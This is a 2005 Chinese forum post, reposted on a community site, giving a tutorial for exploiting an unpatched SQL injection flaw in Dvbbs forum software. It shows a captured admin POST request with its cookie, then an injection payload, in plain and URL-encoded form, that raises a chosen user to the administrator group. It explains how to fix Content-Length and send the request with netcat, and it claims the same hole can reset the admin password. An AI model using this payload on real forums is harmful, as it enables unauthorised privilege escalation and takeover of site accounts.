收藏文章 楼主
动网BBS新漏洞利用动画
网友【血蜘蛛】 2005-06-21 21:39:52 分享在【时代发展的印记】版块    2    1
先找一个没有固顶帖子的版面,自己找找去。一个论坛总不可能哪个版块都有固顶吧?点进去看看有没有固定帖子什么的,我是用前天搞的一个论坛。当然要“符合”漏洞条件了。以前台管理员的身份登陆,也不一定要用前台管理员进去,一个斑竹就行,能固顶帖子就行了,然后随便发个帖子。

WSE抓包工具准备抓取提交的post信息,打开了之后点下确认操作。

截取到了post提交信息,复制下来,内容如下:

POST /bbs/admin_postings.asp?action=istop HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*

Referer: shichr.com/bbs/admin_postings.asp?action=istop

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: [url=shichr.com]shichr.com

Content-Length: 144

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: dwebsiteshichr%2Ecom%2Dh%2D2003%2D3%2D14bbs=UserID=1&usercookies=0&password=3N263U7ggb314iwb&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=2182871850; ASPSESSIONIDCSDCCRAT=OLCEBFEBBKGIJKAAFDIEEHMF; upNum=0; Dvbbs=

istopaction=1&boardID=2&ID=7&title=&content=fff&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&alltop=1&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7

现在我们做什么呢?把getboard改成1,1);update [dv_user] set usergroupid=1 where userid=2;-- 不过我们得先转下unicode编码,用encoder.exe转一下,转换结果如下%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%32%3B%2D%2D%20

把那个getboard=1把这个1换为注射语句就行了。这条语句的意思是将userid值为2的用户提到管理员组,不过只是前台管理员哦。然后算一下增加了多少个字符修改下Content-Length的值,我也懒得去数就改成278吧。修改完之后就用NC提交

提交前我给大家看一下数据库中的userid=2,哈,现在不是管理员

好,提交

我们看看userid=2的用户是否成为管理员了,userid=2对应的用户名是:Knight,为了省事,我就直接在后台查看下这个用户的权限是否为管理员了,

呵呵,真的提升为管理员了,这个漏洞不光可以将用户从普通权限提升为管理员,而且还可以直接更改后台管理员的密码,这够严重的吧?动网官方论坛到现在都还没出补丁。真够郁闷的

嘿,其实,我们只要是斑竹就可以做到,但是有点郁闷啊 ,哎,只有斑竹才可以,但是,我们也有这样一个思想,以后再想怎么利用吧,这文章来自卫队主站上,我给大家找下看,哈哈

会员下载区开通.VIP软件免费下载.,

完!

红色特卫队正在组建卫队原创组,希望大家不要保留技术,积极参与我们,谢谢~~3Q

〖红色特卫队〗-------- by weiyi
meiguo.com 发布人签名/座右铭·有时你看似是一件很吃亏的事,往往会变成非常有得的事。
·凡事都留有余地,因为人是人,不是神,不免有错处,可以原谅人的地方,就原谅人。
·好的时候不要看得太好,坏的时候不要看的太坏。
大家都在看
回复/评论列表
默认   热门   正序   倒序
蝶舞门人
2F
太强,不能不顶----
 0   2005-09-15 10:13:37  回复
meiguo.com 创始人

emotion

1   2005-06-21 21:39:52  回复

回复/评论:动网BBS新漏洞利用动画

暂无用户组 升级
退出
等级:0级
美果:
美过
精华推荐
  1. 以色列和哈马斯终于同意停火
  2. 美国首都机场为何全美风险最高?川普总统“怒喷航管弱智”
  3. 遭遇“断粮”的BBC叛变了?
  4. 赴美生子的中国人在纠结剖不剖?美国人在寻思“移民鹤岗”呢!
  5. 《纽约时报》刊登的中国父子文章:为何送儿子留学美国
  6. 川普总统在接任首日或将推上百项行政命令
  7. DOGE让1.4万公务员失业?马斯克已经做好最坏心理准备!
  8. 滞留太空的NASA宇航员即将返回地球
  9. 在美国买房,看Open House时需要注意的问题汇总
  10. 北美留学生注意,美国和加拿大即将共享所有移民和签证讯息!
  11. DeepSeek已经让成人玩具“率先受益”
  12. 美签面签后的全面复盘:审核原因和拒签因素剖析
  13. 美国房产的保值要点,但却被九成华人买家忽视了!
  14. 全美境内,非法移民“驱逐战”打响了!
  15. “TikTok难民”如何玩转中国社交网络?一夜间“小红书”刷屏全美
  16. 23岁中国女留学生在南加州的住所内遇害,曾控诉白人男友“性虐待”!
  17. 川普总统首次公开回应“TRUMP”数字货币项目
  18. 谷歌地图和苹果地图已经都修改了美国湾(墨西哥湾)
  19. 赵本山在纽约:前排票价1400美元,团队聚餐画面曝光!
  20. “复活版”TikTok“拿捏了”美国人的软肋?
  21. 美国“H1B签证”新一轮抽签在3月份开启,新变化真不少!
  22. 大S【徐熙媛】病逝,享年48岁!
  23. 滞留美国的华裔非法移民“遭遇流放”,首批119人已起飞!
  24. 川普总统在开工首日就向1300万非法移民动手了
  25. 川普政府的“朝令夕改”最短纪录再次刷新
  26. 福布斯曝光了Deepseek 梁文锋的净资产
  27. 美国留学的政策大变?众多名校陷入财政危机,扩招中国学生?
  28. 川普总统正式接任,成为美国第47任总统
  29. 风向有变?🇨🇳中央召开民企座谈会,寓意深刻!
  30. 华人害华人!涉及1500万美元的芝加哥“大型持枪绑架案”嫌疑人半数落网
  31. TikTok在美国全面恢复了
  32. 中国电影市场的2025春节档 ~ 简直就是神仙打架
  33. 在美国生活,这四证缺一不可!
  34. 美军再次增建两艘新航母
  35. 陆地入境美国受阻,“华人偷渡客”已经改用快艇登陆了?
  36. 周受资 ~ 真正强大的CEO

美国动态 美果转盘 美果商店

Your IP: 3.12.107.192, 2025-03-16 11:57:35

Processed in 0.69165 second(s)

头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息
已有0次打赏
(1) 分享
分享
取消